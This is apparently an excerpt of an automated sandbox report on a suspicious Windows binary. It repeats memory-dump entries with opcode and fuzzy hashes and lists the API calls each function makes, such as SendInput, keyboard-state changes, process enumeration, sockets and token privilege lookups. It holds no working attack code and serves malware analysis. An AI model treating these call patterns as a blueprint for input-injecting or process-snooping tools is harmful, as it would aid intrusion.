                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AddressFreeLibraryProc
                                                • String ID: GetSystemWow64DirectoryW$X64
                                                • API String ID: 3013587201-2590602151
                                                • Opcode ID: e9d0d174f390c45b71d9cd920f70244f378d3083ec3cd8479706207018db8902
                                                • Instruction ID: 0b90b13ec85af04db34f9c90fd8d29fe54aa680639c52263857bdf243e7d459b
                                                • Opcode Fuzzy Hash: e9d0d174f390c45b71d9cd920f70244f378d3083ec3cd8479706207018db8902
                                                • Instruction Fuzzy Hash: CDF055B5F05A208BC77102115C2896D3FB0BF12701BA88D26E802EB244EB20CC44C2B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8578f3d0aac6b0e00a43cb10c0aa0e71d98254ee7c952f1ab8b223c4d1836df
                                                • Instruction ID: a66f30f55023ea489b0ddf1a63732a3597511ff16080eb6116a363c08c1efad8
                                                • Opcode Fuzzy Hash: e8578f3d0aac6b0e00a43cb10c0aa0e71d98254ee7c952f1ab8b223c4d1836df
                                                • Instruction Fuzzy Hash: 29C16D75A00216EFCB14CF94D898AAEBBF5FF48314F209598E509EB291D731DD41EB90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                • String ID:
                                                • API String ID: 1998397398-0
                                                • Opcode ID: 60f024b417318b33880e3f4025eafc44358c8a7a8db3dd3ca70887c17f494415
                                                • Instruction ID: 668b0a821a1b4d8ff13a3f0aec4b6cc11244cac9605a81a188f9f9832a3beae0
                                                • Opcode Fuzzy Hash: 60f024b417318b33880e3f4025eafc44358c8a7a8db3dd3ca70887c17f494415
                                                • Instruction Fuzzy Hash: DFA14975204201DFDB10DF28C489A6ABBE5FF8D714F058859F98A9B362DB30EE45CB91
                                                APIs
                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005AFC08,?), ref: 005705F0
                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005AFC08,?), ref: 00570608
                                                • CLSIDFromProgID.OLE32(?,?,00000000,005ACC40,000000FF,?,00000000,00000800,00000000,?,005AFC08,?), ref: 0057062D
                                                • _memcmp.LIBVCRUNTIME ref: 0057064E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                • Opcode ID: cad1f59382c62924ea53cf19128c96f0ab7c43fe6dfb078b7315cadeade281ed
                                                • Instruction ID: 853643bb8abe0d859517d7a55ba91d36adbb0d36eb3dce13e5160036971bdeca
                                                • Opcode Fuzzy Hash: cad1f59382c62924ea53cf19128c96f0ab7c43fe6dfb078b7315cadeade281ed
                                                • Instruction Fuzzy Hash: 27811C71A00109EFCB04DF94C988DEEBBF9FF89315F108558E506AB290DB71AE06DB60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 26761c60a35de7da804ddc60fd3569eb2d525dcb7c1e48995331b88ae76008bc
                                                • Instruction ID: 45c1923008adaf492b3dc735f0795fb6801f190f85a5fd9c959c5b60691cc93d
                                                • Opcode Fuzzy Hash: 26761c60a35de7da804ddc60fd3569eb2d525dcb7c1e48995331b88ae76008bc
                                                • Instruction Fuzzy Hash: 1B416935A00902EBDF216BB98C5ABAF3FA4FF81371F140627FC19C6192F67448495765
                                                APIs
                                                • GetWindowRect.USER32(0158E690,?), ref: 005A62E2
                                                • ScreenToClient.USER32(?,?), ref: 005A6315
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 005A6382
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: 52ec338d578cd0c20444c3495194bd77716a393a8eaf88a09e74580a5eab00b8
                                                • Instruction ID: 1750203f7b1eaf19aaf35c07f46c79752b1c70fb1ba27bb79646e6d86bf0eadb
                                                • Opcode Fuzzy Hash: 52ec338d578cd0c20444c3495194bd77716a393a8eaf88a09e74580a5eab00b8
                                                • Instruction Fuzzy Hash: 2D514A74A00249EFCF14DF68D880AAE7BB5FF96360F14856AF8159B290D730ED81DB90
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 00591AFD
                                                • WSAGetLastError.WSOCK32 ref: 00591B0B
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00591B8A
                                                • WSAGetLastError.WSOCK32 ref: 00591B94
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorLast$socket
                                                • String ID:
                                                • API String ID: 1881357543-0
                                                • Opcode ID: d386b4f7722a9fc0b3e674156dc7e61f4f639ac5e84bb701d39eff38a64f1088
                                                • Instruction ID: ed1b5fd3ae5a4b8d786e99ed45286a4aa5f3ed9e37243dcd300ca3a35e9a8f94
                                                • Opcode Fuzzy Hash: d386b4f7722a9fc0b3e674156dc7e61f4f639ac5e84bb701d39eff38a64f1088
                                                • Instruction Fuzzy Hash: 2441A1346406126FEB20AF24C88AF657BE6BF85718F548448F5169F3D2D772ED828B90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7603d5051b786705936bdacf40334e1075eeceb1d4241edf7a44a93e8efea392
                                                • Instruction ID: f48dd1b68af5ac0b5d65c0a7d208a9d4479702f63bf4235af218ce3b1c1782fe
                                                • Opcode Fuzzy Hash: 7603d5051b786705936bdacf40334e1075eeceb1d4241edf7a44a93e8efea392
                                                • Instruction Fuzzy Hash: 2A41E675A00705AFEB249F38CC46BEABFA9FBC8714F10452AF555DB682D771D9018780
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00585783
                                                • GetLastError.KERNEL32(?,00000000), ref: 005857A9
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005857CE
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005857FA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: b56dcd06be71e784add282c570a71e1f1363500182236f832993702df914d5a6
                                                • Instruction ID: 97622cd1184923acccc44fbc011619ff12179e0308cad823a8e074549deb3814
                                                • Opcode Fuzzy Hash: b56dcd06be71e784add282c570a71e1f1363500182236f832993702df914d5a6
                                                • Instruction Fuzzy Hash: 5C410839600611DFDB11EF15C449A5EBFF2BF89320B198488E84AAB362DB30FD41DB91
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00536D71,00000000,00000000,005382D9,?,005382D9,?,00000001,00536D71,?,00000001,005382D9,005382D9), ref: 0054D910
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0054D999
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0054D9AB
                                                • __freea.LIBCMT ref: 0054D9B4
                                                  • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 580bf88760472203997ed1162c675482d3fdf208579fbfb91a578e2191407046
                                                • Instruction ID: dc9ba10fea6b5aaf33a3f7abd3d426312178b81510ae4826cd85b99abcd707ec
                                                • Opcode Fuzzy Hash: 580bf88760472203997ed1162c675482d3fdf208579fbfb91a578e2191407046
                                                • Instruction Fuzzy Hash: 6E31A872A0020AABDF248F64DC49AEE7FB5FB41354F050169EC04D62A0EB358D54CBA0
                                                APIs
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 005A5352
                                                • GetWindowLongW.USER32(?,000000F0), ref: 005A5375
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A5382
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005A53A8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: LongWindow$InvalidateMessageRectSend
                                                • String ID:
                                                • API String ID: 3340791633-0
                                                • Opcode ID: 74731ac663ca00aec47cdf147cc1082140f03bd06720b5b4c25fdb16dda904ee
                                                • Instruction ID: 25cbc3b5dc07b2c93bd2823fcccbc58678022017fe9f4e6f55f5a47f6e17b9a6
                                                • Opcode Fuzzy Hash: 74731ac663ca00aec47cdf147cc1082140f03bd06720b5b4c25fdb16dda904ee
                                                • Instruction Fuzzy Hash: 3331C134A55A08EFEF249E14CC45FEC3F65BB96390F984803FA11961E1E7B09940AB41
                                                APIs
                                                • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0057ABF1
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 0057AC0D
                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 0057AC74
                                                • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0057ACC6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 70d1605154a81490c527c4639d5994a4193afb5e76bfdd890b407a326cd9d707
                                                • Instruction ID: 48b198dd83313fb857cdd5a0f827b44f9b8d15db2bf5d32bf5664fbce874f750
                                                • Opcode Fuzzy Hash: 70d1605154a81490c527c4639d5994a4193afb5e76bfdd890b407a326cd9d707
                                                • Instruction Fuzzy Hash: A631E730A00618BFFF26CB65A809BFE7EA9BBC5310F04C61AF489561D1C3758D85A752
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 005A769A
                                                • GetWindowRect.USER32(?,?), ref: 005A7710
                                                • PtInRect.USER32(?,?,005A8B89), ref: 005A7720
                                                • MessageBeep.USER32(00000000), ref: 005A778C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: bca1ddb3d3754f72d57eb063424e8c0488189e73f960527e9d4657b79a9a7384
                                                • Instruction ID: 027ccd4b9684eaa5016031f3e9ebcee76028b9eb94039745946855cd2a3821d0
                                                • Opcode Fuzzy Hash: bca1ddb3d3754f72d57eb063424e8c0488189e73f960527e9d4657b79a9a7384
                                                • Instruction Fuzzy Hash: 3E418738A096599FCB01CF58CC94EADBFF4FB9E300F1940A8E854DB261C730A985DB90
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 005A16EB
                                                  • Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
                                                  • Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
                                                  • Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65
                                                • GetCaretPos.USER32(?), ref: 005A16FF
                                                • ClientToScreen.USER32(00000000,?), ref: 005A174C
                                                • GetForegroundWindow.USER32 ref: 005A1752
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: 5391be74a83a66b3b512acd3c74d2ba2f998e340167ace881ce08b96ff4f5cc6
                                                • Instruction ID: 697dcada456007c4ff9dd02e4da64457bfeb40fe9f98f048e87ef06e840727e9
                                                • Opcode Fuzzy Hash: 5391be74a83a66b3b512acd3c74d2ba2f998e340167ace881ce08b96ff4f5cc6
                                                • Instruction Fuzzy Hash: 50310C75D00249AFDB04EFA9C8858EEBBF9FF89304B5480A9E415A7211D6319E45CBA0
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0057D501
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0057D50F
                                                • Process32NextW.KERNEL32(00000000,?), ref: 0057D52F
                                                • CloseHandle.KERNEL32(00000000), ref: 0057D5DC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 48295adde6f564ff33f5dd67e6fe03865055bdf0c57b277dc5e1292b29985055
                                                • Instruction ID: 0cbd07d4ea5bc414d7b2edae0afe1046bfdd6431b579897f7af5bc7426a4cc97
                                                • Opcode Fuzzy Hash: 48295adde6f564ff33f5dd67e6fe03865055bdf0c57b277dc5e1292b29985055
                                                • Instruction Fuzzy Hash: 2D318D71108301AFD301EF54D885AAFBFF8BFD9344F10492DF585821A1EB719988DBA2
                                                APIs
                                                  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                • GetCursorPos.USER32(?), ref: 005A9001
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00567711,?,?,?,?,?), ref: 005A9016
                                                • GetCursorPos.USER32(?), ref: 005A905E
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00567711,?,?,?), ref: 005A9094
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: b27de6c6acbec6156de4e9a1ab71f2b631d74f07c9319cb743fd2d600a2bce84
                                                • Instruction ID: 78e1e6217114ea4b349123317358e3a9b9251f61f825ac4805193c2b6f17d459
                                                • Opcode Fuzzy Hash: b27de6c6acbec6156de4e9a1ab71f2b631d74f07c9319cb743fd2d600a2bce84
                                                • Instruction Fuzzy Hash: FB217F35600128EFDB298F94D898EEE7FB9FF8B390F144055F9058B2A1C7319990EB60
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,005ACB68), ref: 0057D2FB
                                                • GetLastError.KERNEL32 ref: 0057D30A
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0057D319
                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,005ACB68), ref: 0057D376
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                • String ID:
                                                • API String ID: 2267087916-0
                                                • Opcode ID: 76388cb94e18f9081e65437e31167cb6815e4a75b097ef71fbd79a80eea411c8
                                                • Instruction ID: dd30ee54f9184e214da932fee3480280e124b6e1bb3a7ee98d63dbb2bdbe9ca2
                                                • Opcode Fuzzy Hash: 76388cb94e18f9081e65437e31167cb6815e4a75b097ef71fbd79a80eea411c8
                                                • Instruction Fuzzy Hash: AF2180745042029FC700DF28D8858AA7FF4BE96324F508E1DF499C32A1DB319949DBA3
                                                APIs
                                                  • Part of subcall function 00571014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0057102A
                                                  • Part of subcall function 00571014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00571036
                                                  • Part of subcall function 00571014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571045
                                                  • Part of subcall function 00571014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0057104C
                                                  • Part of subcall function 00571014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00571062
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005715BE
                                                • _memcmp.LIBVCRUNTIME ref: 005715E1
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00571617
                                                • HeapFree.KERNEL32(00000000), ref: 0057161E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
